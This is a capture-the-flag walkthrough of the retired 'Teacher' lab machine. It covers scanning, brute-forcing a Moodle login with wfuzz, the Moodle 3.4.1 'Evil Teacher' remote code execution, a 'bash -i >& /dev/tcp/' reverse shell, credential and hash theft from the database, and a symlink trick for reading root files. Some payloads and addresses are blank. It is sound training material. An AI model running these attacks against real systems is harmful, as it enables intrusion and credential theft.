Name: Teacher
Release Date: 01 Dec 2018
Retire Date: 20 Apr 2019
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
0xEA31 00 days, 04 hours, 17 mins, 00 seconds
Frizen 00 days, 05 hours, 29 mins, 16 seconds
Creator: Gioo
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -oA ./Teacher

$ nmap -sC -sV -Pn -oA ./Teacher
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 10:38 EDT
Nmap scan report for
Host is up (0.064s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.68 seconds


We've got HTTP looks to be only port open running Apache 2.4.25.  So, let's take a peek at just the site itself.  While just manually looking around, we find a gallery page that looks to be missing an image.

If we look at the source of the page, we see that that is "/images/5.png".  Curl that and we get the below information.


kali@kali:~$ curl
Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?



While we were manually looking around, we also had gobuster running.  It found a moodle directory and some other bits of fun.

$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/08/24 10:37:36 Starting gobuster
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/javascript (Status: 301)
/js (Status: 301)
/manual (Status: 301)
/moodle (Status: 301)
/phpmyadmin (Status: 403)
/server-status (Status: 403)
2020/08/24 10:39:47 Finished

So it looks like our friend Giovanni teaches Algebra.  We know all but the last character.  Let's build a quick list of possible combinations and then try them with wfuzz.

PASS = 'Th4C00lTheacha'
CHAR = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,<.>/@;:]}[{|`¬+=_-)#~(*&^%$£"!?\\\'"'
for c in CHAR:

Run that with


$python3 listcreator.py > passwords.txt


and then wfuzz it with


$wfuzz -w passwords.txt --hh 440 -t 20 -d "anchor=&username=giovanni&password=FUZZ"

wfuzz -w passwords.txt --hh 440 -t 20 -d "anchor=&username=giovanni&password=FUZZ"

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for 
more information.

* Wfuzz 2.4.5 - The Web Fuzzer                         *

Total requests: 97

ID           Response   Lines    Word     Chars       Payload  

000000083:   303        6 L      34 W     454 Ch      "Th4C00lTheacha#"

Total time: 9.017998
Processed Requests: 97
Filtered Requests: 96
Requests/sec.: 10.75626


And that with we have Giovanni's creds.  giovanni:Th4C00lTheacha# So let's check around Moodle for common exploits.  We find a big one in https://www.exploit-db.com/exploits/46551 and it looks like it applies Moodle 3.4.1 - Remote Code Execution.  They call it Evil Teacher.  It allows you to create a Quiz inside of Moodle that will generate a low-level shell back to your attacking machine.  For starters, go into the Algebra Course and turn editing on in the settings menu. Then you can "Add an activity or resource" and select Quiz.

You'll need to create a "Calculated" question.  To do that, after creating the Quiz select Save and Display.  From there, click the Settings gear again and scroll down to Questions.

Once you are inside the Question Bank, you can select Create New Question, and then Calculated.  What you enter as the required information is really irrelevant until you get to the Answer 1 Formula field. For the formula add




into that field and Save and Continue Editing.  It should be asking to Choose Wildcard dataset properties or some such, but that's irrelevant.  We are where we need to be to add a URL encoded string that should call back to our machine.  Fire up Burp and capture the "returnurl" request and forward it to repeater.  Here, you should add your


bash -i >& /dev/tcp/ 0>&1


to the end of the URL and instant reverse shell.

Copy your LinEnum script into tmp and run it to see what's there.  What you are looking for though, is actually in the config.php file of the Moodle CMS directory located at /var/www/html/moodle/config.php.  In there, you will find MariaDB credentials.

If we use moodle, and then show tables, we will see mdl_user which has a nice set of hashes for us to use.  The only one we really care about is Giovanni's.




Which is an MD5 that we can break down to "expelled".  Side note: the other hashes are in the CTB file as is the LinEnum output.  Moving along, we can su to giovanni with the expelled password and grab the user flag.  Onward to root!


Anti-climactic I know.  Looking around again, we find a backup.sh script in the /usr/bin directory.


cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;


Since this is a retired box, am I am feeling VERY lazy today, let's just worry about the Root Flag and not a root shell. We can do this with symlinks.  A simple link from root to a fake root folder will work.


giovanni@teacher:~$ cd work
cd work
giovanni@teacher:~/work$ ls
courses  tmp
giovanni@teacher:~/work$ cd tmp
cd tmp
giovanni@teacher:~/work/tmp$ ln -s /root fakeroot
ln -s /root fakeroot
giovanni@teacher:~/work/tmp$cd fakeroot
cd fakeroot
giovanni@teacher:~/work/tmp/fakeroot$ ls
giovanni@teacher:~/work/tmp/fakeroot$ cat root.txt
cat root.txt